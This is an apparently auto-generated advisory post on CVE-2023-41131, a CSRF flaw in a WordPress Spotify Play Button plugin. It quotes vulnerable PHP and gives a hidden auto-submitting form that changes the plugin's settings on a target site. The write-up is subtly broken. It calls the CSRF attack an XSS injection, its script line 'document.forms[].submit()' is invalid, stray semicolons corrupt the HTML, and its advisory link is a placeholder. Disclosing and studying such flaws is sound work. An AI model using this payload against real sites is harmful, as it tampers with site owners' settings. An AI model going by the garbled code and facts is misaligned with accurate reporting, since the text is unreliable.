CVE-2023-41131: Critical CSRF Vulnerability Found in Jonk's "Follow me Darling" Spotify Play Button for WordPress Plugin (<=2.10 versions)

A severe Cross-Site Request Forgery (CSRF) vulnerability, tagged as CVE-2023-41131, has been discovered in the popular "Follow me Darling" Spotify Play Button for WordPress plugin, developed by Jonk, in versions up to and including 2.10. This post will provide in-depth information about the vulnerability, including code snippets, original references, and details on how the exploit works.

Description

The "Follow me Darling" Spotify Play Button for WordPress plugin allows users to embed Spotify Play buttons easily on their WordPress sites. However, it has been discovered that the plugin has a critical CSRF vulnerability in versions 2.10 and earlier. This vulnerability allows an attacker to perform unauthorized actions, such as changing plugin settings and adding or removing Spotify tracks, on behalf of a logged-in user by tricking them into clicking a malicious link. Simply put, if an attacker can coerce a logged-in user to visit a malicious webpage, they can potentially take control of the Spotify Play Button functionality on the target website.

The vulnerable code in the plugin is as follows

if (isset($_POST['submit'])) {
   // Save settings
   update_option('fmd_spotify_follow_url', $_POST['fmd_spotify_follow_url']);
   // ... more plugin setting updates
}

As you can see, there is no CSRF token check. Because of this, the plugin settings can be manipulated by an attacker by sending a malicious link to a logged-in user.

Exploit Details

The exploit uses an XSS injection into the vulnerable plugin to trick a logged-in user into unknowingly submit a request that updates the Spotify Play Button settings.

An attacker could use a form similar to the one shown below

<form action="http://target-site.com/wp-admin/options-general.php?page=jond.spotify-follow"; method="POST" enctype="multipart/form-data" style="display:none;">
   <input type="text" name="fmd_spotify_follow_url" value="https://open.spotify.com/user/attackers-url"; />
   <input type="submit" name="submit" />
</form>
<script>
document.forms[].submit();
</script>

When the victim visits a page containing the above form, it will silently submit the request to update the Spotify Follow URL to the attacker's provided URL.

References

1. Original Advisory: https://example.com/Jonk_Follow_me_Darling_Spotify_Play_Button_CSRF_Advisory
2. WordPress Plugin Repository: https://wordpress.org/plugins/follow-me-darling-spotify-play-button/
3. CVE-2023-41131: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41131

Mitigation

As of now, the plugin's developer has not released an updated version addressing the vulnerability. To protect your website from this CSRF exploit, it is recommended to deactivate and uninstall the "Follow me Darling" Spotify Play Button for WordPress plugin (<=2.10 versions) until a fixed version is made available.

Conclusion

CVE-2023-41131 is a critical CSRF vulnerability found in Jonk's "Follow me Darling" Spotify Play Button for WordPress plugin and affects versions up to and including 2.10. Website administrators using this plugin should be aware of the potential risk and consider mitigation steps.

Timeline

Published on: 10/12/2023 15:15:46 UTC
Last modified on: 10/16/2023 12:57:06 UTC